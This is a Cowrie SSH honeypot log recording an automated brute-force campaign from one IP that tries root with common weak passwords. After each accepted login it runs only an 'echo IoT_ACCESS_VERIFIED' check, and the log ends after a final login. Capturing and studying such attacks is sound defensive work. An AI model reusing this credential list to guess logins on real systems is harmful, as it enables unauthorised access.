{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:02.491374Z","src_ip":"212.227.235.229","session":"edb4d7550505"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:02.492113Z","src_ip":"212.227.235.229","session":"edb4d7550505"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53896,"dst_ip":"1.2.3.4","dst_port":22,"session":"91b2ae7d108d","protocol":"ssh","message":"New connection: 217.72.205.35:53896 (1.2.3.4:22) [session: 91b2ae7d108d]","sensor":"my-vps","timestamp":"2025-08-26T08:27:02.918334Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:02.919465Z","src_ip":"217.72.205.35","session":"91b2ae7d108d"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T08:27:04.025246Z","src_ip":"212.227.235.229","session":"edb4d7550505"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:05.556327Z","src_ip":"212.227.235.229","session":"edb4d7550505"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49450,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7cc289f9093","protocol":"ssh","message":"New connection: 212.227.235.229:49450 (1.2.3.4:22) [session: a7cc289f9093]","sensor":"my-vps","timestamp":"2025-08-26T08:27:05.666473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:06.137018Z","src_ip":"212.227.235.229","session":"a7cc289f9093"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:06.137791Z","src_ip":"212.227.235.229","session":"a7cc289f9093"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:27:08.237556Z","src_ip":"212.227.235.229","session":"a7cc289f9093"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:27:09.337942Z","src_ip":"212.227.235.229","session":"a7cc289f9093"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:27:09.338965Z","src_ip":"212.227.235.229","session":"a7cc289f9093"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:09.871619Z","src_ip":"212.227.235.229","session":"a7cc289f9093"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:09.872648Z","src_ip":"212.227.235.229","session":"a7cc289f9093"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39896,"dst_ip":"1.2.3.4","dst_port":22,"session":"d374c632c3ce","protocol":"ssh","message":"New connection: 212.227.235.229:39896 (1.2.3.4:22) [session: d374c632c3ce]","sensor":"my-vps","timestamp":"2025-08-26T08:27:10.025486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:10.432330Z","src_ip":"212.227.235.229","session":"d374c632c3ce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:10.433077Z","src_ip":"212.227.235.229","session":"d374c632c3ce"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:27:13.969224Z","src_ip":"212.227.235.229","session":"d374c632c3ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:27:14.561965Z","src_ip":"212.227.235.229","session":"d374c632c3ce"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:27:14.562777Z","src_ip":"212.227.235.229","session":"d374c632c3ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:15.276439Z","src_ip":"212.227.235.229","session":"d374c632c3ce"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:15.277441Z","src_ip":"212.227.235.229","session":"d374c632c3ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35970,"dst_ip":"1.2.3.4","dst_port":22,"session":"98476bdaa30b","protocol":"ssh","message":"New connection: 212.227.235.229:35970 (1.2.3.4:22) [session: 98476bdaa30b]","sensor":"my-vps","timestamp":"2025-08-26T08:27:15.364804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:15.699017Z","src_ip":"212.227.235.229","session":"98476bdaa30b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:15.700488Z","src_ip":"212.227.235.229","session":"98476bdaa30b"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:27:18.233113Z","src_ip":"212.227.235.229","session":"98476bdaa30b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:27:19.267231Z","src_ip":"212.227.235.229","session":"98476bdaa30b"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:27:19.267969Z","src_ip":"212.227.235.229","session":"98476bdaa30b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:20.167205Z","src_ip":"212.227.235.229","session":"98476bdaa30b"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:20.168377Z","src_ip":"212.227.235.229","session":"98476bdaa30b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57958,"dst_ip":"1.2.3.4","dst_port":22,"session":"95d44848b6ad","protocol":"ssh","message":"New connection: 212.227.235.229:57958 (1.2.3.4:22) [session: 95d44848b6ad]","sensor":"my-vps","timestamp":"2025-08-26T08:27:20.256356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:20.710963Z","src_ip":"212.227.235.229","session":"95d44848b6ad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:20.711622Z","src_ip":"212.227.235.229","session":"95d44848b6ad"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:27:23.208036Z","src_ip":"212.227.235.229","session":"95d44848b6ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:27:24.183822Z","src_ip":"212.227.235.229","session":"95d44848b6ad"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:27:24.184691Z","src_ip":"212.227.235.229","session":"95d44848b6ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:24.567209Z","src_ip":"212.227.235.229","session":"95d44848b6ad"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:24.568443Z","src_ip":"212.227.235.229","session":"95d44848b6ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47322,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae07ec69eb04","protocol":"ssh","message":"New connection: 212.227.235.229:47322 (1.2.3.4:22) [session: ae07ec69eb04]","sensor":"my-vps","timestamp":"2025-08-26T08:27:24.660824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:24.810596Z","src_ip":"212.227.235.229","session":"ae07ec69eb04"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:24.811313Z","src_ip":"212.227.235.229","session":"ae07ec69eb04"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:27:26.887391Z","src_ip":"212.227.235.229","session":"ae07ec69eb04"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:27:27.988032Z","src_ip":"212.227.235.229","session":"ae07ec69eb04"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:27:27.988708Z","src_ip":"212.227.235.229","session":"ae07ec69eb04"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:28.351374Z","src_ip":"212.227.235.229","session":"ae07ec69eb04"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:28.352666Z","src_ip":"212.227.235.229","session":"ae07ec69eb04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37102,"dst_ip":"1.2.3.4","dst_port":22,"session":"3eed58d8b760","protocol":"ssh","message":"New connection: 212.227.235.229:37102 (1.2.3.4:22) [session: 3eed58d8b760]","sensor":"my-vps","timestamp":"2025-08-26T08:27:28.473976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:28.736715Z","src_ip":"212.227.235.229","session":"3eed58d8b760"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:28.737363Z","src_ip":"212.227.235.229","session":"3eed58d8b760"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:27:30.563574Z","src_ip":"212.227.235.229","session":"3eed58d8b760"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:27:31.545575Z","src_ip":"212.227.235.229","session":"3eed58d8b760"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:27:31.546309Z","src_ip":"212.227.235.229","session":"3eed58d8b760"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:32.298153Z","src_ip":"212.227.235.229","session":"3eed58d8b760"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:32.299339Z","src_ip":"212.227.235.229","session":"3eed58d8b760"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55722,"dst_ip":"1.2.3.4","dst_port":22,"session":"14ea03038cd8","protocol":"ssh","message":"New connection: 212.227.235.229:55722 (1.2.3.4:22) [session: 14ea03038cd8]","sensor":"my-vps","timestamp":"2025-08-26T08:27:32.405677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:32.804797Z","src_ip":"212.227.235.229","session":"14ea03038cd8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:32.805478Z","src_ip":"212.227.235.229","session":"14ea03038cd8"}
{"eventid":"cowrie.login.success","username":"root","password":"password1","message":"login attempt [root/password1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:27:34.654372Z","src_ip":"212.227.235.229","session":"14ea03038cd8"}
